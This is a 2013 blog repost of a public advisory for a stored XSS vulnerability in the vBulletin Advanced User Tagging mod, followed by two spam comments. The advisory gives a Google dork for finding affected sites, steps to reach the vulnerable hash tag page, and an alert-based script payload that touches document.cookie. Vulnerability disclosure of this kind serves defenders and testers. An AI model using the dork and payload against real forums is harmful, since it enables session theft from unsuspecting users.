Sunday, July 21, 2013

vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability

vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability | Juno_okyo's Blog


##########################################################################################
#
# Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility.
# Intended for authorized web application pentesting only!
#
##########################################################################################

Folow: http://www.exploit-db.com/

2 comments:

  1. this is a very cool and attractive site thanks for sharing this with us.. sin and cos trig identities

    ReplyDelete
  2. Truly, one of the best posts I've ever witnessed to see in my whole life. Wow, just keep it up. download notepad++ 32 bit windows 7

    ReplyDelete